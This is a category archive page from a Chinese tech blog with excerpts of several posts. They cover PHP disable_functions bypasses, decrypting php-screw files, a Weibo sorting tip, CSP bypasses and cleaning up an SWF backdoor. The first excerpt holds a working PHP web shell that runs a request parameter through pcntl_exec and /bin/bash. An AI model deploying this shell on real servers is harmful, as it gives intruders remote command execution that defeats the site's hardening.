Category Archives: 技术随笔

技术随笔-随手记录一些生活中用到的技术

php disable_functions bypass

PHP 4 >= 4.2.0, PHP 5 pcntl_exec

<?php
$dir = '/var/tmp/';
$cmd = 'ls';
$option = '-l';
$pathtobin = '/bin/bash';
 
$arg = array($cmd, $option, $dir);
 
pcntl_exec($pathtobin, $arg);
echo '123';
?>
<?php
$cmd = @$_REQUEST[cmd];
if(function_exists('pcntl_exec')) {
    $cmd = $cmd."&pkill -9 bash >out";
    pcntl_exec("/bin/bash", $cmd);
    echo file_get_contents("out");        
} else {
        echo '不支持pcntl扩展';
}
?>

Continue reading

关于php-screw 解密

最近同事遇到了screw加密的问题,之前也没接触过这款加密扩展,便上网搜了下解决办法,顺便在这里记录一下,以便以后能用到。

情况复原,了解了下之后去官网把扩展下回来,把环境搭建起来了:
官网:https://sourceforge.net/projects/php-screw/

下回来之后make编译一下,编译好了之后,这款加密程序加密之后会生成对应后缀的文件,譬如1.php,加密之后就会替换掉1.php,而源文件(未加密的)则会更名为:1.php.screw

在github上找到对应的解密程序:https://github.com/firebroo/screw_decode

下载解密程序并编译:
git clone https://github.com/firebroo/screw_decode.git
make

Continue reading

小技巧–通过搜索来显示正常的新浪微博排序

不知道从什么时候开始,新浪微博客户端不再是和以前那样,按照时间线的顺序来排序微博了,用起来非常郁闷。经常刷了好几次微博依然都是几个小时甚至是几天以前的。能否通过一些技巧来重新让以前的排序回到我们的微博呢?目前从微博上了解到是可以的。

以我iphone客户端为例,先点击发现(其实就是搜索)

sousuo

 

点击之后,通过输入… : Continue reading

csp与bypass的探讨(译文)

这篇文章是对http://blog.innerht.ml/csp-2015/ 的翻译,因为最近在想对抗csp策略的一些绕过方式,而该文章给了我不少的tips,个人认为还是值得和大家分享一下。

2015年。事情已经发生了很多变化,我们目睹了ECMAScript的版本在2015升级到了第5版本。它使得前端技术具有快速的变化,也有像资源的完整性和客户端的保护机制。许多新的建议被提到网站安全的防范上。

CSP,安全机制,试图涵盖在客户端的广泛的攻击面,也升级到第二阶段。在这篇文章里,我想简单用一个我用在推特的bug绕过csp的例子,讨论了它的有效性和存在的不足。 Continue reading

jiathis插件又爆了跨站,顺带附上解决swf后门的小办法

其实jiathis跨站不是第一次爆了,官方不知怎么的,一直好像不太重视,导致类似这样的安全漏洞屡次出现。

在写上一篇文章的时候,惊现弹窗了。追查才发现不知啥时候中了别人的rootkit。

排查了一段时间发现暂时没有可疑的异常情况之后,顺便把swf后门的清除办法分享一下,其实此类后门清除在乌云已经有人纰漏过。

案例:http://www.wooyun.org/bugs/wooyun-2010-051615 Continue reading